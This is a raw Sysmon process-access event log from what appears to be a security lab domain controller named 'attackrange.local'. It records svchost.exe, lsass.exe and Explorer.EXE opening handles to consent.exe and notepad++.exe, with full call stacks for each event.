07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.770{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.754{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.739{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.717{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.717{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.702{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.702{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F4E3-60EB-407D-00000000CF01}9972C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.655{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.655{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:07.655{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 